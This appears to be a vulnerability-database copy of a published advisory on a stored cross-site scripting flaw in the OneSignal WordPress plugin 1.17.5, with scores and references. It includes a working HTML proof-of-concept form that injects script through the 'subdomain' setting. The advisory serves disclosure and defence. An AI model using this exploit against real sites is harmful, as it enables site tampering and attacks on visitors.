3.5 Low
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:S/C:N/I:P/A:N
5.4 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
0.001 Low
EPSS
Percentile
26.6%
Title: WordPress Plugin OneSignal 1.17.5 Persistent Cross-Site Scripting
Advisory ID: ZSL-2019-5530
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 18.07.2019
OneSignal is a high volume and reliable push notification service for websites and mobile applications. We support all major native and mobile platforms by providing dedicated SDKs for each platform, a RESTful server API, and an online dashboard for marketers to design and send push notifications.
The application suffers from an authenticated stored XSS via POST request. The issue is triggered when input passed via the POST parameter ‘subdomain’ is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of an affected site.
iWT Ltd. - <https://www.onesignal.com>
1.17.5
WordPress 5.2.2
Apache/2.4.39
PHP/7.1.30
N/A
Vulnerability discovered by Gjoko Krstic - <[email protected]>
[1] <https://wordpress.org/plugins/onesignal-free-web-push-notifications/>
[2] <https://www.exploit-db.com/exploits/47136>
[3] <https://packetstormsecurity.com/files/153682>
[4] <https://cxsecurity.com/issue/WLB-2019070091>
[5] <https://exchange.xforce.ibmcloud.com/vulnerabilities/164034>
[6] <https://vulners.com/cve/CVE-2019-15827>
[7] <https://nvd.nist.gov/vuln/detail/CVE-2019-15827>
[8] <https://wpscan.com/vulnerability/9478>
[9] <https://wpvulndb.com/vulnerabilities/9478>
[10] <https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/onesignal-free-web-push-notifications/onesignal-web-push-notifications-1177-stored-cross-site-scripting>
[18.07.2019] - Initial release
[19.07.2019] - Added reference [3] and [4]
[24.07.2019] - Added reference [5]
[26.04.2020] - Added reference [6] and [7]
[28.09.2021] - Added reference [8]
[16.12.2022] - Added reference [9] and [10]
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
<!--
WordPress Plugin OneSignal 1.17.5 Persistent Cross-Site Scripting
Vendor: OneSignal
Product web page: https://www.onesignal.com
https://wordpress.org/plugins/onesignal-free-web-push-notifications/
Affected version: 1.17.5
Summary: OneSignal is a high volume and reliable push notification service
for websites and mobile applications. We support all major native and mobile
platforms by providing dedicated SDKs for each platform, a RESTful server API,
and an online dashboard for marketers to design and send push notifications.
Desc: The application suffers from an authenticated stored XSS via POST request.
The issue is triggered when input passed via the POST parameter 'subdomain' is
not properly sanitized before being returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in context
of an affected site.
Tested on: WordPress 5.2.2
Apache/2.4.39
PHP/7.1.30
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5530
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5530.php
17.07.2019
--><html>
<body>
<script>history.pushState('', 'SHPA', '/')</script>
<form action="http://127.0.0.1/wp-admin/admin.php?page=onesignal-push" method="POST">
<input name="onesignal_config_page_nonce" type="hidden" value="f7fae30a4f"/>
<input name="_wp_http_referer" type="hidden" value="/wp-admin/admin.php?page=onesignal-push"/>
<input name="app_id" type="hidden" value="14d99ab2-fc9d-1337-bc16-a8a6df479515"/>
<input name="app_rest_api_key" type="hidden" value="M2IzZDA4MzItOGJmOS00YjRkLWE4YzEtZSLmMjllNjlkYmZl"/>
<input name="subdomain" type="hidden" value=""/><script>confirm(251)</script>" />
<input name="safari_web_id" type="hidden" value=""/>
<input name="showNotificationIconFromPostThumbnail" type="hidden" value="true"/>
<input name="showNotificationImageFromPostThumbnail" type="hidden" value="true"/>
<input name="persist_notifications" type="hidden" value="platform-default"/>
<input name="notification_title" type="hidden" value="hACKME"/>
<input name="notifyButton_enable" type="hidden" value="true"/>
<input name="notifyButton_showAfterSubscribed" type="hidden" value="true"/>
<input name="notifyButton_prenotify" type="hidden" value="true"/>
<input name="notifyButton_showcredit" type="hidden" value="true"/>
<input name="notifyButton_customize_enable" type="hidden" value="true"/>
<input name="notifyButton_size" type="hidden" value="medium"/>
<input name="notifyButton_position" type="hidden" value="bottom-right"/>
<input name="notifyButton_theme" type="hidden" value="default"/>
<input name="notifyButton_offset_bottom" type="hidden" value=""/>
<input name="notifyButton_offset_left" type="hidden" value=""/>
<input name="notifyButton_offset_right" type="hidden" value=""/>
<input name="notifyButton_color_background" type="hidden" value=""/>
<input name="notifyButton_color_foreground" type="hidden" value=""/>
<input name="notifyButton_color_badge_background" type="hidden" value=""/>
<input name="notifyButton_color_badge_foreground" type="hidden" value=""/>
<input name="notifyButton_color_badge_border" type="hidden" value=""/>
<input name="notifyButton_color_pulse" type="hidden" value=""/>
<input name="notifyButton_color_popup_button_background" type="hidden" value=""/>
<input name="notifyButton_color_popup_button_background_hover" type="hidden" value=""/>
<input name="notifyButton_color_popup_button_background_active" type="hidden" value=""/>
<input name="notifyButton_color_popup_button_color" type="hidden" value=""/>
<input name="notifyButton_message_prenotify" type="hidden" value=""/>
<input name="notifyButton_tip_state_unsubscribed" type="hidden" value=""/>
<input name="notifyButton_tip_state_subscribed" type="hidden" value=""/>
<input name="notifyButton_tip_state_blocked" type="hidden" value=""/>
<input name="notifyButton_message_action_subscribed" type="hidden" value=""/>
<input name="notifyButton_message_action_resubscribed" type="hidden" value=""/>
<input name="notifyButton_message_action_unsubscribed" type="hidden" value=""/>
<input name="notifyButton_dialog_main_title" type="hidden" value=""/>
<input name="notifyButton_dialog_main_button_subscribe" type="hidden" value=""/>
<input name="notifyButton_dialog_main_button_unsubscribe" type="hidden" value=""/>
<input name="notifyButton_dialog_blocked_title" type="hidden" value=""/>
<input name="notifyButton_dialog_blocked_message" type="hidden" value=""/>
<input name="prompt_customize_enable" type="hidden" value="true"/>
<input name="prompt_action_message" type="hidden" value=""/>
<input name="prompt_auto_accept_title" type="hidden" value=""/>
<input name="prompt_site_name" type="hidden" value=""/>
<input name="prompt_example_notification_title_desktop" type="hidden" value=""/>
<input name="prompt_example_notification_message_desktop" type="hidden" value=""/>
<input name="prompt_example_notification_title_mobile" type="hidden" value=""/>
<input name="prompt_example_notification_message_mobile" type="hidden" value=""/>
<input name="prompt_example_notification_caption" type="hidden" value=""/>
<input name="prompt_accept_button_text" type="hidden" value=""/>
<input name="prompt_cancel_button_text" type="hidden" value=""/>
<input name="send_welcome_notification" type="hidden" value="true"/>
<input name="welcome_notification_title" type="hidden" value=""/>
<input name="welcome_notification_message" type="hidden" value=""/>
<input name="welcome_notification_url" type="hidden" value=""/>
<input name="notification_on_post" type="hidden" value="true"/>
<input name="utm_additional_url_params" type="hidden" value=""/>
<input name="allowed_custom_post_types" type="hidden" value=""/>
<input name="custom_manifest_url" type="hidden" value=""/>
<input name="show_notification_send_status_message" type="hidden" value="true"/>
<input type="submit" value="Send"/>
</form>
</body>
</html>
3.5 Low
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:S/C:N/I:P/A:N
5.4 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
0.001 Low
EPSS
Percentile
26.6%